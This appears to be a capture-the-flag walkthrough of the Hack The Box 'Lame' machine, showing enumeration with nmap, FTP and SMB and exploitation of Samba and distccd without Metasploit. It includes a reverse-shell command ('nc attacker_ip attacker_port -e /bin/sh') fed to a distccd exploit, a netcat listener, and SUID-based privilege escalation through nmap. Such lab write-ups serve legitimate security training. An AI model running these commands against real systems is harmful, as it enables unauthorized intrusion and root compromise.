HTB Lame - NO Metasploit Walkthrough

In this walkthrough, we’re going to explore two ways to root Lame without metasploit. If you are ready let's dive in.

We would start with an nmap scan as usual:

Enumeration

nmap -p- 10.129.22.59
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-04-20 15:30 CDT
Nmap scan report for 10.129.22.59
Host is up (0.070s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3632/tcp open  distccd

I usually check all port first, then check each services individually. We would follow the same flow here.

We got ftp, ssh, smb and distccd, let's look into these services one at a time:

21 - FTP:

nmap -A -p21 10.129.22.59
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-04-20 15:34 CDT
Nmap scan report for 10.129.22.59
Host is up (0.071s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.15.162
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.23 (92%), DD-WRT v24-sp1 (Linux 2.4.36) (90%), Arris TG862G/CT cable modem (90%), Control4 HC-300 home controller (90%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (90%), Dell Integrated Remote Access Controller (iDRAC6) (90%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (90%), Linux 2.4.21 - 2.4.31 (likely embedded) (90%), Linux 2.4.27 (90%), Linux 2.4.7 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Unix

TRACEROUTE (using port 21/tcp)
HOP RTT      ADDRESS
1   70.36 ms 10.10.14.1
2   70.76 ms 10.129.22.59

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.36 seconds

From our scan Anonymous FTP login allowed (FTP code 230), this sounds good.

Let's try to login, we are able to login but nothing serious in there

ftp 10.129.22.59
Connected to 10.129.22.59.
220 (vsFTPd 2.3.4)
Name (10.129.22.59:root): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||53820|).
150 Here comes the directory listing.
226 Directory send OK.

But when we check the version of the ftp, vsftpd 2.3.4
We found out that this version is vulnerable to: VSFTPD 2.3.4 Backdoor Command Execution.

But because we do not want to use metasploit, let's check other services.

22 - ssh

nmap -A -p22 10.129.22.59
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-04-20 15:39 CDT
Nmap scan report for 10.129.22.59
Host is up (0.071s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.23 (91%), DD-WRT v24-sp1 (Linux 2.4.36) (90%), Arris TG862G/CT cable modem (90%), Dell Integrated Remote Access Controller (iDRAC6) (90%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (90%), Linux 2.4.21 - 2.4.31 (likely embedded) (90%), Linux 2.4.27 (90%), Linux 2.4.7 (90%), Linux 2.6.27 - 2.6.28 (90%), Linux 2.6.8 - 2.6.30 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   70.14 ms 10.10.14.1
2   70.53 ms 10.129.22.59

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.82 seconds

It seems nothing is in ssh

Let's move to smb, for the smb we are going to combine the 339/445

339/445 - samba

nmap -A -p139,445 10.129.22.59
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-04-20 15:42 CDT
Nmap scan report for 10.129.22.59
Host is up (0.071s latency).

PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (90%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (90%), Dell Integrated Remote Access Controller (iDRAC5) (90%), Linux 2.4.21 - 2.4.31 (likely embedded) (90%), Linux 2.4.7 (90%), Linux 2.6.18 (ClarkConnect 4.3 Enterprise Edition) (90%), Linux 2.6.8 - 2.6.30 (90%), Dell iDRAC 6 remote access controller (Linux 2.6) (90%), Linksys WRV54G WAP (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2026-04-20T16:43:38-04:00
|_clock-skew: mean: 2h00m39s, deviation: 2h49m44s, median: 37s
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

TRACEROUTE (using port 139/tcp)
HOP RTT      ADDRESS
1   70.41 ms 10.10.14.1
2   70.59 ms 10.129.22.59

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.91 seconds

The smb/samba version discovered: smbd 3.0.20-Debian. Let's try to access the shares with smbclient:

smbclient //10.129.22.59/anonymous
Password for [WORKGROUP\iamdayone]:
Anonymous login successful
tree connect failed: NT_STATUS_BAD_NETWORK_NAME

It shows Anonymous login successful, let's try to list the shares:

smbclient -L \\\\10.129.22.59\\
Password for [WORKGROUP\iamdayone]:
Anonymous login successful

    Sharename       Type      Comment
    ---------       ----      -------
    print$          Disk      Printer Drivers
    tmp             Disk      oh noes!
    opt             Disk      
    IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
    ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

    Server               Comment
    ---------            -------

    Workgroup            Master
    ---------            -------
    WORKGROUP            LAME

I was able to list the share, but I was unable to access any of the shares.

Now let's check the version on google for any know vulnerability, We found out that the samba version 3.0.20 is vulnerable to: username map script and because I do not want to use metasploit, I use the exploit here

With the exploit we got root shell, now need for privilege escalation:

Remember that we still one more service left, let's try to see if we can compromise that as well without metasploit, why not:

3632 - distccd

nmap -A -p3632 10.129.22.59
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-04-20 15:45 CDT
Nmap scan report for 10.129.22.59
Host is up (0.071s latency).

PORT     STATE SERVICE VERSION
3632/tcp open  distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.23 (92%), Belkin N300 WAP (Linux 2.6.30) (90%), Control4 HC-300 home controller (90%), Dell Integrated Remote Access Controller (iDRAC5) (90%), Dell Integrated Remote Access Controller (iDRAC6) (90%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (90%), Linux 2.4.21 - 2.4.31 (likely embedded) (90%), Linux 2.4.7 (90%), Citrix XenServer 5.5 (Linux 2.6.18) (90%), Linux 2.6.18 (ClarkConnect 4.3 Enterprise Edition) (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 3632/tcp)
HOP RTT      ADDRESS
1   70.75 ms 10.10.14.1
2   71.01 ms 10.129.22.59

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.90 seconds

The service version running is: distccd v1, let's check if this is vulnerable.

After some googling, we discovered that this version is vulnerable to: distccd v1 RCE (CVE-2004-2687). Remeber, we do not want to use metasploit.

After several search, I found this exploit, which wouldn't work: exploit

I upgraded the exploit code to python3 to see if it would work, upgraded exploit here

Once you have exploit ready, start ncat listerner on your local machine:

nc -lvnp attacker_port

Then run the exploit with the command below:

python3 exploit.py -t target_ip -p target_port -c "nc attacker_ip attacker_port -e /bin/sh"

I pop a shell:

If you noticed, with this shell, unlike the samba shell, we are not root. Therefore, we need to escalate our privilege.

Privilege Escalation

First, let's check SUID to see if there are binaries we can ride on to become root:

find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/umount
/bin/fusermount
/bin/su
/bin/mount
/bin/ping
/bin/ping6
/sbin/mount.nfs
/lib/dhcp3-client/call-dhclient-script
/usr/bin/sudoedit
/usr/bin/X
/usr/bin/netkit-rsh
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/netkit-rlogin
/usr/bin/arping
/usr/bin/at
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/nmap
/usr/bin/chsh
/usr/bin/netkit-rcp
/usr/bin/passwd
/usr/bin/mtr
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/telnetlogin
/usr/lib/apache2/suexec
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper

From output above /usr/bin/nmap looks juicy. Let's check GTFBINS:

We found nmap and command to run on GTFBINs, what are we waiting for? Let's run the command:

We are root!

Lessons Learned

This machine reinforced the importance of approaching exploitation from multiple angles. While distccd (CVE-2004-2687) provided a straightforward remote code execution path, exploring the Samba service revealed an alternative route to compromise. This highlights that real-world targets often have more than one viable attack vector.

Avoiding automated tools like Metasploit forced a deeper understanding of the underlying vulnerabilities. Rewriting the exploits improved my ability to analyze exploit logic, adapt payloads, and troubleshoot issues when things didn’t work as expected.

Another key takeaway is the critical role of thorough enumeration. Identifying outdated and vulnerable services early on made exploitation significantly easier. This emphasizes that enumeration is often the most important phase of a penetration test.

Finally, this machine demonstrates how legacy services such as distccd and Samba can pose serious security risks when left unpatched, reinforcing the importance of proper system hardening and regular updates.